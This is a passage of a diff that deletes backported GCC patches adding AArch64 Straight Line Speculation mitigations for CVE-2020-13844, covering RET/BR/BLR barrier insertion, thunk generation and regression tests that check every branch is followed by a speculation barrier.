-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
- }
-- [(set_attr "type" "branch")]
-+ [(set_attr "type" "branch")
-+ (set_attr "sls_length" "retbr")]
- )
-
- (define_expand "return"
-@@ -755,8 +778,12 @@
- (define_insn "simple_return"
- [(simple_return)]
- "aarch64_use_simple_return_insn_p ()"
-- "ret"
-- [(set_attr "type" "branch")]
-+ {
-+ output_asm_insn ("ret", operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+ }
-+ [(set_attr "type" "branch")
-+ (set_attr "sls_length" "retbr")]
- )
-
- (define_insn "*cb<optab><mode>1"
-@@ -947,10 +974,16 @@
- (match_operand 1 "" ""))
- (return)]
- "SIBLING_CALL_P (insn)"
-- "@
-- br\\t%0
-- b\\t%c0"
-- [(set_attr "type" "branch, branch")]
-+ {
-+ if (which_alternative == 0)
-+ {
-+ output_asm_insn ("br\\t%0", operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+ }
-+ return "b\\t%c0";
-+ }
-+ [(set_attr "type" "branch, branch")
-+ (set_attr "sls_length" "retbr,none")]
- )
-
- (define_insn "*sibcall_value_insn"
-@@ -960,10 +993,16 @@
- (match_operand 2 "" "")))
- (return)]
- "SIBLING_CALL_P (insn)"
-- "@
-- br\\t%1
-- b\\t%c1"
-- [(set_attr "type" "branch, branch")]
-+ {
-+ if (which_alternative == 0)
-+ {
-+ output_asm_insn ("br\\t%1", operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+ }
-+ return "b\\t%c1";
-+ }
-+ [(set_attr "type" "branch, branch")
-+ (set_attr "sls_length" "retbr,none")]
- )
-
- ;; Call subroutine returning any type.
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
-new file mode 100644
-index 000000000..7656123ee
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
-@@ -0,0 +1,15 @@
-+/* Avoid ILP32 since pacret is only available for LP64 */
-+/* { dg-do compile { target { ! ilp32 } } } */
-+/* { dg-additional-options "-mharden-sls=retbr -mbranch-protection=pac-ret -march=armv8.3-a" } */
-+
-+/* Testing the do_return pattern for retaa. */
-+long retbr_subcall(void);
-+long retbr_do_return_retaa(void)
-+{
-+ return retbr_subcall()+1;
-+}
-+
-+/* Ensure there are no BR or RET instructions which are not directly followed
-+ by a speculation barrier. */
-+/* { dg-final { scan-assembler-not {\t(br|ret|retaa)\tx[0-9][0-9]?\n\t(?!dsb\tsy\n\tisb)} } } */
-+/* { dg-final { scan-assembler-not {ret\t} } } */
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
-new file mode 100644
-index 000000000..573b30cdc
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
-@@ -0,0 +1,119 @@
-+/* We ensure that -Wpedantic is off since it complains about the trampolines
-+ we explicitly want to test. */
-+/* { dg-additional-options "-mharden-sls=retbr -Wno-pedantic " } */
-+/*
-+ Ensure that the SLS hardening of RET and BR leaves no unprotected RET/BR
-+ instructions.
-+ */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+ foo *x;
-+ bar *y;
-+ int left;
-+ int right;
-+};
-+
-+int
-+retbr_sibcall_value_insn (struct sls_testclass x)
-+{
-+ return x.x(x.left, x.right);
-+}
-+
-+void
-+retbr_sibcall_insn (struct sls_testclass x)
-+{
-+ x.y(x.left, x.right);
-+}
-+
-+/* Aim to test two different returns.
-+ One that introduces a tail call in the middle of the function, and one that
-+ has a normal return. */
-+int
-+retbr_multiple_returns (struct sls_testclass x)
-+{
-+ int temp;
-+ if (x.left % 10)
-+ return x.x(x.left, 100);
-+ else if (x.right % 20)
-+ {
-+ return x.x(x.left * x.right, 100);
-+ }
-+ temp = x.left % x.right;
-+ temp *= 100;
-+ temp /= 2;
-+ return temp % 3;
-+}
-+
-+void
-+retbr_multiple_returns_void (struct sls_testclass x)
-+{
-+ if (x.left % 10)
-+ {
-+ x.y(x.left, 100);
-+ }
-+ else if (x.right % 20)
-+ {
-+ x.y(x.left * x.right, 100);
-+ }
-+ return;
-+}
-+
-+/* Testing the casesi jump via register. */
-+__attribute__ ((optimize ("Os")))
-+int
-+retbr_casesi_dispatch (struct sls_testclass x)
-+{
-+ switch (x.left)
-+ {
-+ case -5:
-+ return -2;
-+ case -3:
-+ return -1;
-+ case 0:
-+ return 0;
-+ case 3:
-+ return 1;
-+ case 5:
-+ break;
-+ default:
-+ __builtin_unreachable ();
-+ }
-+ return x.right;
-+}
-+
-+/* Testing the BR in trampolines is mitigated against. */
-+void f1 (void *);
-+void f3 (void *, void (*)(void *));
-+void f2 (void *);
-+
-+int
-+retbr_trampolines (void *a, int b)
-+{
-+ if (!b)
-+ {
-+ f1 (a);
-+ return 1;
-+ }
-+ if (b)
-+ {
-+ void retbr_tramp_internal (void *c)
-+ {
-+ if (c == a)
-+ f2 (c);
-+ }
-+ f3 (a, retbr_tramp_internal);
-+ }
-+ return 0;
-+}
-+
-+/* Testing the indirect_jump pattern. */
-+void
-+retbr_indirect_jump (int *buf)
-+{
-+ __builtin_longjmp(buf, 1);
-+}
-+
-+/* Ensure there are no BR or RET instructions which are not directly followed
-+ by a speculation barrier. */
-+/* { dg-final { scan-assembler-not {\t(br|ret|retaa)\tx[0-9][0-9]?\n\t(?!dsb\tsy\n\tisb|sb)} } } */
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
-new file mode 100644
-index 000000000..812250379
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
-@@ -0,0 +1,73 @@
-+# Regression driver for SLS mitigation on AArch64.
-+# Copyright (C) 2020 Free Software Foundation, Inc.
-+# Contributed by ARM Ltd.
-+#
-+# This file is part of GCC.
-+#
-+# GCC is free software; you can redistribute it and/or modify it
-+# under the terms of the GNU General Public License as published by
-+# the Free Software Foundation; either version 3, or (at your option)
-+# any later version.
-+#
-+# GCC is distributed in the hope that it will be useful, but
-+# WITHOUT ANY WARRANTY; without even the implied warranty of
-+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-+# General Public License for more details.
-+#
-+# You should have received a copy of the GNU General Public License
-+# along with GCC; see the file COPYING3. If not see
-+# <http://www.gnu.org/licenses/>. */
-+
-+# Exit immediately if this isn't an AArch64 target.
-+if {![istarget aarch64*-*-*] } then {
-+ return
-+}
-+
-+# Load support procs.
-+load_lib gcc-dg.exp
-+load_lib torture-options.exp
-+
-+# If a testcase doesn't have special options, use these.
-+global DEFAULT_CFLAGS
-+if ![info exists DEFAULT_CFLAGS] then {
-+ set DEFAULT_CFLAGS " "
-+}
-+
-+# Initialize `dg'.
-+dg-init
-+torture-init
-+
-+# Use different architectures as well as the normal optimisation options.
-+# (i.e. use both SB and DSB+ISB barriers).
-+
-+set save-dg-do-what-default ${dg-do-what-default}
-+# Main loop.
-+# Run with torture tests (i.e. a bunch of different optimisation levels) just
-+# to increase test coverage.
-+set dg-do-what-default assemble
-+gcc-dg-runtest [lsort [glob -nocomplain $srcdir/$subdir/*.\[cCS\]]] \
-+ "-save-temps" $DEFAULT_CFLAGS
-+
-+# Run the same tests but this time with SB extension.
-+# Since not all supported assemblers will support that extension we decide
-+# whether to assemble or just compile based on whether the extension is
-+# supported for the available assembler.
-+
-+set templist {}
-+foreach x $DG_TORTURE_OPTIONS {
-+ lappend templist "$x -march=armv8.3-a+sb "
-+ lappend templist "$x -march=armv8-a+sb "
-+}
-+set-torture-options $templist
-+if { [check_effective_target_aarch64_asm_sb_ok] } {
-+ set dg-do-what-default assemble
-+} else {
-+ set dg-do-what-default compile
-+}
-+gcc-dg-runtest [lsort [glob -nocomplain $srcdir/$subdir/*.\[cCS\]]] \
-+ "-save-temps" $DEFAULT_CFLAGS
-+set dg-do-what-default ${save-dg-do-what-default}
-+
-+# All done.
-+torture-finish
-+dg-finish
-diff --git a/gcc/testsuite/lib/target-supports.exp b/gcc/testsuite/lib/target-supports.exp
-index ea9a50ccb..79482f9b6 100644
---- a/gcc/testsuite/lib/target-supports.exp
-+++ b/gcc/testsuite/lib/target-supports.exp
-@@ -8579,7 +8579,8 @@ proc check_effective_target_aarch64_tiny { } {
- # Create functions to check that the AArch64 assembler supports the
- # various architecture extensions via the .arch_extension pseudo-op.
-
--foreach { aarch64_ext } { "fp" "simd" "crypto" "crc" "lse" "dotprod" "sve"} {
-+foreach { aarch64_ext } { "fp" "simd" "crypto" "crc" "lse" "dotprod" "sve"
-+ "sb"} {
- eval [string map [list FUNC $aarch64_ext] {
- proc check_effective_target_aarch64_asm_FUNC_ok { } {
- if { [istarget aarch64*-*-*] } {
---
-2.25.1
-
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch b/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch
deleted file mode 100644
index 6dffef0a34..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch
+++ /dev/null
@@ -1,659 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From 2155170525f93093b90a1a065e7ed71a925566e9 Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:59 +0100
-Subject: [PATCH 3/3] aarch64: Mitigate SLS for BLR instruction
-
-This patch introduces the mitigation for Straight Line Speculation past
-the BLR instruction.
-
-This mitigation replaces BLR instructions with a BL to a stub which uses
-a BR to jump to the original value. These function stubs are then
-appended with a speculation barrier to ensure no straight line
-speculation happens after these jumps.
-
-When optimising for speed we use a set of stubs for each function since
-this should help the branch predictor make more accurate predictions
-about where a stub should branch.
-
-When optimising for size we use one set of stubs for all functions.
-This set of stubs can have human readable names, and we are using
-`__call_indirect_x<N>` for register x<N>.
-
-When BTI branch protection is enabled the BLR instruction can jump to a
-`BTI c` instruction using any register, while the BR instruction can
-only jump to a `BTI c` instruction using the x16 or x17 registers.
-Hence, in order to ensure this transformation is safe we mov the value
-of the original register into x16 and use x16 for the BR.
-
-As an example when optimising for size:
-a
- BLR x0
-instruction would get transformed to something like
- BL __call_indirect_x0
-where __call_indirect_x0 labels a thunk that contains
-__call_indirect_x0:
- MOV X16, X0
- BR X16
- <speculation barrier>
-
-The first version of this patch used local symbols specific to a
-compilation unit to try and avoid relocations.
-This was mistaken since functions coming from the same compilation unit
-can still be in different sections, and the assembler will insert
-relocations at jumps between sections.
-
-On any relocation the linker is permitted to emit a veneer to handle
-jumps between symbols that are very far apart. The registers x16 and
-x17 may be clobbered by these veneers.
-Hence the function stubs cannot rely on the values of x16 and x17 being
-the same as just before the function stub is called.
-
-Similar can be said for the hot/cold partitioning of single functions,
-so function-local stubs have the same restriction.
-
-This updated version of the patch never emits function stubs for x16 and
-x17, and instead forces other registers to be used.
-
-Given the above, there is now no benefit to local symbols (since they
-are not enough to avoid dealing with linker intricacies). This patch
-now uses global symbols with hidden visibility each stored in their own
-COMDAT section. This means stubs can be shared between compilation
-units while still avoiding the PLT indirection.
-
-This patch also removes the `__call_indirect_x30` stub (and
-function-local equivalent) which would simply jump back to the original
-location.
-
-The function-local stubs are emitted to the assembly output file in one
-chunk, which means we need not add the speculation barrier directly
-after each one.
-This is because we know for certain that the instructions directly after
-the BR in all but the last function stub will be from another one of
-these stubs and hence will not contain a speculation gadget.
-Instead we add a speculation barrier at the end of the sequence of
-stubs.
-
-The global stubs are emitted in COMDAT/.linkonce sections by
-themselves so that the linker can remove duplicates from multiple object
-files. This means they are not emitted in one chunk, and each one must
-include the speculation barrier.
-
-Another difference is that since the global stubs are shared across
-compilation units we do not know that all functions will be targeting an
-architecture supporting the SB instruction.
-Rather than provide multiple stubs for each architecture, we provide a
-stub that will work for all architectures -- using the DSB+ISB barrier.
-
-This mitigation does not apply for BLR instructions in the following
-places:
-- Some accesses to thread-local variables use a code sequence with a BLR
- instruction. This code sequence is part of the binary interface between
- compiler and linker. If this BLR instruction needs to be mitigated, it'd
- probably be best to do so in the linker. It seems that the code sequence
- for thread-local variable access is unlikely to lead to a Spectre Revalation
- Gadget.
-- PLT stubs are produced by the linker and each contain a BLR instruction.
- It seems that at most only after the last PLT stub a Spectre Revalation
- Gadget might appear.
-
-Testing:
- Bootstrap and regtest on AArch64
- (with BOOT_CFLAGS="-mharden-sls=retbr,blr")
- Used a temporary hack(1) in gcc-dg.exp to use these options on every
- test in the testsuite, a slight modification to emit the speculation
- barrier after every function stub, and a script to check that the
- output never emitted a BLR, or unmitigated BR or RET instruction.
- Similar on an aarch64-none-elf cross-compiler.
-
-1) Temporary hack emitted a speculation barrier at the end of every stub
-function, and used a script to ensure that:
- a) Every RET or BR is immediately followed by a speculation barrier.
- b) No BLR instruction is emitted by compiler.
-
-(cherry picked from 96b7f495f9269d5448822e4fc28882edb35a58d7)
-
-gcc/ChangeLog:
-
- * config/aarch64/aarch64-protos.h (aarch64_indirect_call_asm):
- New declaration.
- * config/aarch64/aarch64.c (aarch64_regno_regclass): Handle new
- stub registers class.
- (aarch64_class_max_nregs): Likewise.
- (aarch64_register_move_cost): Likewise.
- (aarch64_sls_shared_thunks): Global array to store stub labels.
- (aarch64_sls_emit_function_stub): New.
- (aarch64_create_blr_label): New.
- (aarch64_sls_emit_blr_function_thunks): New.
- (aarch64_sls_emit_shared_blr_thunks): New.
- (aarch64_asm_file_end): New.
- (aarch64_indirect_call_asm): New.
- (TARGET_ASM_FILE_END): Use aarch64_asm_file_end.
- (TARGET_ASM_FUNCTION_EPILOGUE): Use
- aarch64_sls_emit_blr_function_thunks.
- * config/aarch64/aarch64.h (STB_REGNUM_P): New.
- (enum reg_class): Add STUB_REGS class.
- (machine_function): Introduce `call_via` array for
- function-local stub labels.
- * config/aarch64/aarch64.md (*call_insn, *call_value_insn): Use
- aarch64_indirect_call_asm to emit code when hardening BLR
- instructions.
- * config/aarch64/constraints.md (Ucr): New constraint
- representing registers for indirect calls. Is GENERAL_REGS
- usually, and STUB_REGS when hardening BLR instruction against
- SLS.
- * config/aarch64/predicates.md (aarch64_general_reg): STUB_REGS class
- is also a general register.
-
-gcc/testsuite/ChangeLog:
-
- * gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c: New test.
- * gcc.target/aarch64/sls-mitigation/sls-miti-blr.c: New test.
----
- gcc/config/aarch64/aarch64-protos.h | 1 +
- gcc/config/aarch64/aarch64.c | 225 +++++++++++++++++-
- gcc/config/aarch64/aarch64.h | 15 ++
- gcc/config/aarch64/aarch64.md | 11 +-
- gcc/config/aarch64/constraints.md | 9 +
- gcc/config/aarch64/predicates.md | 3 +-
- .../aarch64/sls-mitigation/sls-miti-blr-bti.c | 40 ++++
- .../aarch64/sls-mitigation/sls-miti-blr.c | 33 +++
- 8 files changed, 328 insertions(+), 9 deletions(-)
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index 885eae893..2676e43ae 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -645,6 +645,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
-
- const char *aarch64_sls_barrier (int);
-+const char *aarch64_indirect_call_asm (rtx);
- extern bool aarch64_harden_sls_retbr_p (void);
- extern bool aarch64_harden_sls_blr_p (void);
-
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index dff61105c..bc6c02c3a 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -8190,6 +8190,9 @@ aarch64_label_mentioned_p (rtx x)
- enum reg_class
- aarch64_regno_regclass (unsigned regno)
- {
-+ if (STUB_REGNUM_P (regno))
-+ return STUB_REGS;
-+
- if (GP_REGNUM_P (regno))
- return GENERAL_REGS;
-
-@@ -8499,6 +8502,7 @@ aarch64_class_max_nregs (reg_class_t regclass, machine_mode mode)
- unsigned int nregs;
- switch (regclass)
- {
-+ case STUB_REGS:
- case TAILCALL_ADDR_REGS:
- case POINTER_REGS:
- case GENERAL_REGS:
-@@ -10693,10 +10697,12 @@ aarch64_register_move_cost (machine_mode mode,
- = aarch64_tune_params.regmove_cost;
-
- /* Caller save and pointer regs are equivalent to GENERAL_REGS. */
-- if (to == TAILCALL_ADDR_REGS || to == POINTER_REGS)
-+ if (to == TAILCALL_ADDR_REGS || to == POINTER_REGS
-+ || to == STUB_REGS)
- to = GENERAL_REGS;
-
-- if (from == TAILCALL_ADDR_REGS || from == POINTER_REGS)
-+ if (from == TAILCALL_ADDR_REGS || from == POINTER_REGS
-+ || from == STUB_REGS)
- from = GENERAL_REGS;
-
- /* Moving between GPR and stack cost is the same as GP2GP. */
-@@ -19009,6 +19015,215 @@ aarch64_sls_barrier (int mitigation_required)
- : "";
- }
-
-+static GTY (()) tree aarch64_sls_shared_thunks[30];
-+static GTY (()) bool aarch64_sls_shared_thunks_needed = false;
-+const char *indirect_symbol_names[30] = {
-+ "__call_indirect_x0",
-+ "__call_indirect_x1",
-+ "__call_indirect_x2",
-+ "__call_indirect_x3",
-+ "__call_indirect_x4",
-+ "__call_indirect_x5",
-+ "__call_indirect_x6",
-+ "__call_indirect_x7",
-+ "__call_indirect_x8",
-+ "__call_indirect_x9",
-+ "__call_indirect_x10",
-+ "__call_indirect_x11",
-+ "__call_indirect_x12",
-+ "__call_indirect_x13",
-+ "__call_indirect_x14",
-+ "__call_indirect_x15",
-+ "", /* "__call_indirect_x16", */
-+ "", /* "__call_indirect_x17", */
-+ "__call_indirect_x18",
-+ "__call_indirect_x19",
-+ "__call_indirect_x20",
-+ "__call_indirect_x21",
-+ "__call_indirect_x22",
-+ "__call_indirect_x23",
-+ "__call_indirect_x24",
-+ "__call_indirect_x25",
-+ "__call_indirect_x26",
-+ "__call_indirect_x27",
-+ "__call_indirect_x28",
-+ "__call_indirect_x29",
-+};
-+
-+/* Function to create a BLR thunk. This thunk is used to mitigate straight
-+ line speculation. Instead of a simple BLR that can be speculated past,
-+ we emit a BL to this thunk, and this thunk contains a BR to the relevant
-+ register. These thunks have the relevant speculation barries put after
-+ their indirect branch so that speculation is blocked.
-+
-+ We use such a thunk so the speculation barriers are kept off the
-+ architecturally executed path in order to reduce the performance overhead.
-+
-+ When optimizing for size we use stubs shared by the linked object.
-+ When optimizing for performance we emit stubs for each function in the hope
-+ that the branch predictor can better train on jumps specific for a given
-+ function. */
-+rtx
-+aarch64_sls_create_blr_label (int regnum)
-+{
-+ gcc_assert (STUB_REGNUM_P (regnum));
-+ if (optimize_function_for_size_p (cfun))
-+ {
-+ /* For the thunks shared between different functions in this compilation
-+ unit we use a named symbol -- this is just for users to more easily
-+ understand the generated assembly. */
-+ aarch64_sls_shared_thunks_needed = true;
-+ const char *thunk_name = indirect_symbol_names[regnum];
-+ if (aarch64_sls_shared_thunks[regnum] == NULL)
-+ {
-+ /* Build a decl representing this function stub and record it for
-+ later. We build a decl here so we can use the GCC machinery for
-+ handling sections automatically (through `get_named_section` and
-+ `make_decl_one_only`). That saves us a lot of trouble handling
-+ the specifics of different output file formats. */
-+ tree decl = build_decl (BUILTINS_LOCATION, FUNCTION_DECL,
-+ get_identifier (thunk_name),
-+ build_function_type_list (void_type_node,
-+ NULL_TREE));
-+ DECL_RESULT (decl) = build_decl (BUILTINS_LOCATION, RESULT_DECL,
-+ NULL_TREE, void_type_node);
-+ TREE_PUBLIC (decl) = 1;
-+ TREE_STATIC (decl) = 1;
-+ DECL_IGNORED_P (decl) = 1;
-+ DECL_ARTIFICIAL (decl) = 1;
-+ make_decl_one_only (decl, DECL_ASSEMBLER_NAME (decl));
-+ resolve_unique_section (decl, 0, false);
-+ aarch64_sls_shared_thunks[regnum] = decl;
-+ }
-+
-+ return gen_rtx_SYMBOL_REF (Pmode, thunk_name);
-+ }
-+
-+ if (cfun->machine->call_via[regnum] == NULL)
-+ cfun->machine->call_via[regnum]
-+ = gen_rtx_LABEL_REF (Pmode, gen_label_rtx ());
-+ return cfun->machine->call_via[regnum];
-+}
-+
-+/* Helper function for aarch64_sls_emit_blr_function_thunks and
-+ aarch64_sls_emit_shared_blr_thunks below. */
-+static void
-+aarch64_sls_emit_function_stub (FILE *out_file, int regnum)
-+{
-+ /* Save in x16 and branch to that function so this transformation does
-+ not prevent jumping to `BTI c` instructions. */
-+ asm_fprintf (out_file, "\tmov\tx16, x%d\n", regnum);
-+ asm_fprintf (out_file, "\tbr\tx16\n");
-+}
-+
-+/* Emit all BLR stubs for this particular function.
-+ Here we emit all the BLR stubs needed for the current function. Since we
-+ emit these stubs in a consecutive block we know there will be no speculation
-+ gadgets between each stub, and hence we only emit a speculation barrier at
-+ the end of the stub sequences.
-+
-+ This is called in the TARGET_ASM_FUNCTION_EPILOGUE hook. */
-+void
-+aarch64_sls_emit_blr_function_thunks (FILE *out_file)
-+{
-+ if (! aarch64_harden_sls_blr_p ())
-+ return;
-+
-+ bool any_functions_emitted = false;
-+ /* We must save and restore the current function section since this assembly
-+ is emitted at the end of the function. This means it can be emitted *just
-+ after* the cold section of a function. That cold part would be emitted in
-+ a different section. That switch would trigger a `.cfi_endproc` directive
-+ to be emitted in the original section and a `.cfi_startproc` directive to
-+ be emitted in the new section. Switching to the original section without
-+ restoring would mean that the `.cfi_endproc` emitted as a function ends
-+ would happen in a different section -- leaving an unmatched
-+ `.cfi_startproc` in the cold text section and an unmatched `.cfi_endproc`
-+ in the standard text section. */
-+ section *save_text_section = in_section;
-+ switch_to_section (function_section (current_function_decl));
-+ for (int regnum = 0; regnum < 30; ++regnum)
-+ {
-+ rtx specu_label = cfun->machine->call_via[regnum];
-+ if (specu_label == NULL)
-+ continue;
-+
-+ targetm.asm_out.print_operand (out_file, specu_label, 0);
-+ asm_fprintf (out_file, ":\n");
-+ aarch64_sls_emit_function_stub (out_file, regnum);
-+ any_functions_emitted = true;
-+ }
-+ if (any_functions_emitted)
-+ /* Can use the SB if needs be here, since this stub will only be used
-+ by the current function, and hence for the current target. */
-+ asm_fprintf (out_file, "\t%s\n", aarch64_sls_barrier (true));
-+ switch_to_section (save_text_section);
-+}
-+
-+/* Emit shared BLR stubs for the current compilation unit.
-+ Over the course of compiling this unit we may have converted some BLR
-+ instructions to a BL to a shared stub function. This is where we emit those
-+ stub functions.
-+ This function is for the stubs shared between different functions in this
-+ compilation unit. We share when optimizing for size instead of speed.
-+
-+ This function is called through the TARGET_ASM_FILE_END hook. */
-+void
-+aarch64_sls_emit_shared_blr_thunks (FILE *out_file)
-+{
-+ if (! aarch64_sls_shared_thunks_needed)
-+ return;
-+
-+ for (int regnum = 0; regnum < 30; ++regnum)
-+ {
-+ tree decl = aarch64_sls_shared_thunks[regnum];
-+ if (!decl)
-+ continue;
-+
-+ const char *name = indirect_symbol_names[regnum];
-+ switch_to_section (get_named_section (decl, NULL, 0));
-+ ASM_OUTPUT_ALIGN (out_file, 2);
-+ targetm.asm_out.globalize_label (out_file, name);
-+ /* Only emits if the compiler is configured for an assembler that can
-+ handle visibility directives. */
-+ targetm.asm_out.assemble_visibility (decl, VISIBILITY_HIDDEN);
-+ ASM_OUTPUT_TYPE_DIRECTIVE (out_file, name, "function");
-+ ASM_OUTPUT_LABEL (out_file, name);
-+ aarch64_sls_emit_function_stub (out_file, regnum);
-+ /* Use the most conservative target to ensure it can always be used by any
-+ function in the translation unit. */
-+ asm_fprintf (out_file, "\tdsb\tsy\n\tisb\n");
-+ ASM_DECLARE_FUNCTION_SIZE (out_file, name, decl);
-+ }
-+}
-+
-+/* Implement TARGET_ASM_FILE_END. */
-+void
-+aarch64_asm_file_end ()
-+{
-+ aarch64_sls_emit_shared_blr_thunks (asm_out_file);
-+ /* Since this function will be called for the ASM_FILE_END hook, we ensure
-+ that what would be called otherwise (e.g. `file_end_indicate_exec_stack`
-+ for FreeBSD) still gets called. */
-+#ifdef TARGET_ASM_FILE_END
-+ TARGET_ASM_FILE_END ();
-+#endif
-+}
-+
-+const char *
-+aarch64_indirect_call_asm (rtx addr)
-+{
-+ gcc_assert (REG_P (addr));
-+ if (aarch64_harden_sls_blr_p ())
-+ {
-+ rtx stub_label = aarch64_sls_create_blr_label (REGNO (addr));
-+ output_asm_insn ("bl\t%0", &stub_label);
-+ }
-+ else
-+ output_asm_insn ("blr\t%0", &addr);
-+ return "";
-+}
-+
- /* Target-specific selftests. */
-
- #if CHECKING_P
-@@ -19529,6 +19744,12 @@ aarch64_libgcc_floating_mode_supported_p
- #define TARGET_RUN_TARGET_SELFTESTS selftest::aarch64_run_selftests
- #endif /* #if CHECKING_P */
-
-+#undef TARGET_ASM_FILE_END
-+#define TARGET_ASM_FILE_END aarch64_asm_file_end
-+
-+#undef TARGET_ASM_FUNCTION_EPILOGUE
-+#define TARGET_ASM_FUNCTION_EPILOGUE aarch64_sls_emit_blr_function_thunks
-+
- struct gcc_target targetm = TARGET_INITIALIZER;
-
- #include "gt-aarch64.h"
-diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
-index 72ddc6fd9..60682a100 100644
---- a/gcc/config/aarch64/aarch64.h
-+++ b/gcc/config/aarch64/aarch64.h
-@@ -540,6 +540,16 @@ extern unsigned aarch64_architecture_version;
- #define GP_REGNUM_P(REGNO) \
- (((unsigned) (REGNO - R0_REGNUM)) <= (R30_REGNUM - R0_REGNUM))
-
-+/* Registers known to be preserved over a BL instruction. This consists of the
-+ GENERAL_REGS without x16, x17, and x30. The x30 register is changed by the
-+ BL instruction itself, while the x16 and x17 registers may be used by
-+ veneers which can be inserted by the linker. */
-+#define STUB_REGNUM_P(REGNO) \
-+ (GP_REGNUM_P (REGNO) \
-+ && (REGNO) != R16_REGNUM \
-+ && (REGNO) != R17_REGNUM \
-+ && (REGNO) != R30_REGNUM) \
-+
- #define FP_REGNUM_P(REGNO) \
- (((unsigned) (REGNO - V0_REGNUM)) <= (V31_REGNUM - V0_REGNUM))
-
-@@ -561,6 +571,7 @@ enum reg_class
- {
- NO_REGS,
- TAILCALL_ADDR_REGS,
-+ STUB_REGS,
- GENERAL_REGS,
- STACK_REG,
- POINTER_REGS,
-@@ -580,6 +591,7 @@ enum reg_class
- { \
- "NO_REGS", \
- "TAILCALL_ADDR_REGS", \
-+ "STUB_REGS", \
- "GENERAL_REGS", \
- "STACK_REG", \
- "POINTER_REGS", \
-@@ -596,6 +608,7 @@ enum reg_class
- { \
- { 0x00000000, 0x00000000, 0x00000000 }, /* NO_REGS */ \
- { 0x00030000, 0x00000000, 0x00000000 }, /* TAILCALL_ADDR_REGS */\
-+ { 0x3ffcffff, 0x00000000, 0x00000000 }, /* STUB_REGS */ \
- { 0x7fffffff, 0x00000000, 0x00000003 }, /* GENERAL_REGS */ \
- { 0x80000000, 0x00000000, 0x00000000 }, /* STACK_REG */ \
- { 0xffffffff, 0x00000000, 0x00000003 }, /* POINTER_REGS */ \
-@@ -735,6 +748,8 @@ typedef struct GTY (()) machine_function
- struct aarch64_frame frame;
- /* One entry for each hard register. */
- bool reg_is_wrapped_separately[LAST_SAVED_REGNUM];
-+ /* One entry for each general purpose register. */
-+ rtx call_via[SP_REGNUM];
- bool label_is_assembled;
- } machine_function;
- #endif
-diff --git a/gcc/config/aarch64/aarch64.md b/gcc/config/aarch64/aarch64.md
-index 494aee964..ed8cf8ece 100644
---- a/gcc/config/aarch64/aarch64.md
-+++ b/gcc/config/aarch64/aarch64.md
-@@ -908,15 +908,14 @@
- )
-
- (define_insn "*call_insn"
-- [(call (mem:DI (match_operand:DI 0 "aarch64_call_insn_operand" "r, Usf"))
-+ [(call (mem:DI (match_operand:DI 0 "aarch64_call_insn_operand" "Ucr, Usf"))
- (match_operand 1 "" ""))
- (clobber (reg:DI LR_REGNUM))]
- ""
- "@
-- blr\\t%0
-+ * return aarch64_indirect_call_asm (operands[0]);
- bl\\t%c0"
-- [(set_attr "type" "call, call")]
--)
-+ [(set_attr "type" "call, call")])
-
- (define_expand "call_value"
- [(parallel [(set (match_operand 0 "" "")
-@@ -934,12 +933,12 @@
-
- (define_insn "*call_value_insn"
- [(set (match_operand 0 "" "")
-- (call (mem:DI (match_operand:DI 1 "aarch64_call_insn_operand" "r, Usf"))
-+ (call (mem:DI (match_operand:DI 1 "aarch64_call_insn_operand" "Ucr, Usf"))
- (match_operand 2 "" "")))
- (clobber (reg:DI LR_REGNUM))]
- ""
- "@
-- blr\\t%1
-+ * return aarch64_indirect_call_asm (operands[1]);
- bl\\t%c1"
- [(set_attr "type" "call, call")]
- )
-diff --git a/gcc/config/aarch64/constraints.md b/gcc/config/aarch64/constraints.md
-index 21f9549e6..7756dbe83 100644
---- a/gcc/config/aarch64/constraints.md
-+++ b/gcc/config/aarch64/constraints.md
-@@ -24,6 +24,15 @@
- (define_register_constraint "Ucs" "TAILCALL_ADDR_REGS"
- "@internal Registers suitable for an indirect tail call")
-
